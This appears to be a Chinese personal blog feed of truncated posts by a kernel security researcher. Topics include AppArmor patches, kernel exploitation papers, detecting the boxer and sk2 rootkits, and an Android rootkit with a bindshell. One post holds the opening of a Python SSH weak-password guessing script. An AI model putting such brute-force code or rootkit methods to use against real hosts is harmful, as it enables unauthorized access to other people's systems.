周末早上起床后， 没打算看大片， 直接把VM跑起来继续读apparmor的代码， 提了一个code cleanup的补丁过去后， john很久都没回我邮件， 这个cleanup还是比较合理的， 用现有的api接口替换掉了老的代码。今早睡不着了， 回个邮件追问下为啥不评论下这个patch， 结果john很快就回了， 原来这位大哥度假去了。。。最近在hack apparmor, 发现比selinux轻量级多了， 规则都很好写， 比较适合做sandbox。 selinux相比就太庞大了， 当初孟哲看其文档都睡着了， 哈哈。 很看好apparmor， ubuntu新版本已经把它作为默认的security module了， 有

在centos5.4上按常规方法编译高版本内核重启后会出错， 解决办法是cp /boot/config-2.6.18-164.el5 .config后， 在make menuconfig， 然后修改.config， 把CONFIG_SYSFS_DEPRECATED选项开启， 在make的时候会提示是否要开启CONFIG_SYSFS_DEPRECATEDV2，选择开启， make modules_install install完毕， 重启后应该还是会报错的：insmod: error inserting ‘/lib/dm-region-hash.ko’: –1 File exits，这时要修改下initrd文件： 
cp /boot/initrd-2.6.36+.img /tmp
mkdir new
cd new
zcat ../initrd-2.6.36+.im

apparmor是最近才加入到kernel主线里的， 昨天看了下代码， 发现了一个memory leak bug和一个kernel crash bug。算了下大概有半年没给kernel贡献补丁了， 以后还是要把主要精力放在kernel开发上。

前段时间写的一篇关于linux kernel溢出的paper， 有兴趣的同学可以看一下， 感谢kevin提供空间：
kevin1986.com/pl/kernal_exp.pdf

前段时间写的一篇关于freebsd kernel溢出的paper， 有兴趣的同学可以看一下， 感谢kevin提供空间：
kevin1986.com/pl/fbsd.pdf

不能转化为money的技术都是浮云

花了2，3天时间学习了下py， 顺便写了个ssh弱密码猜解脚本， 脚本确实很方便， 但性能跟不上， 看需求来选择语言了：）

#!/usr/bin/python

import sys,os
import threading
import paramiko

ssh_passwd = []
ssh_passwd_flag = 0

def ssh_connect(host, user, passwd):
try:
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(host, 22, user, passwd)
client.clo

boxer这个mem rk是在07年的时候被一个管理员给爆出来的， 很专业的一个rk， 有很多人猜测boxer是不是就是sk2改进来的， 单从hook方式来说， boxer跟sk2不一样， sk2是直接替换了int 0x80的handler function, 所以判断有没有被sk2入侵， 只需读idt表的0x80项， 在跟/proc/kallsyms里的system_call做比较即可。 boxer更先进一点， 它是在system_call里， 把call *sys_call_tabl(, %eax, 4)替换为movl $0xnew_idt_handler, %edx, jmp *%edx来进一步处理， 所以判断机器有没有被boxer入侵， 只需从system_call开始搜寻0xe2也就是jmp的机器码

阿里巴巴集团安全校园招聘正式启动了！阿里巴巴集团安全中心隶属于阿里巴巴集团技术研究院，负责保障阿里巴巴B2B、淘宝、支付宝、阿里云等各个子公司的业务安全，制定集团统一的安全标准，建立平台化的技术体系，并以优异的技术支撑各个子公司的信息安全建设。

 

周日在家研究了下 Android内核， 成功的在模拟器上运行了一个rootkit程序， 隐藏文件，进程，模块，开启了一个bindshell监听某个端口。 今年defcon上有黑客演示了运行在android手机上的rootkit，但他那篇paper写的太水了， 里面讲到还要修改内核代码来突破模块校验， 这个我去年就写过paper讲述如何bypass模块校验了。 Android内核本来就是在linux kernel上改进的， 所以rootkit方法大同小异， 会写x86架构下的rootkit就会写arm下的了。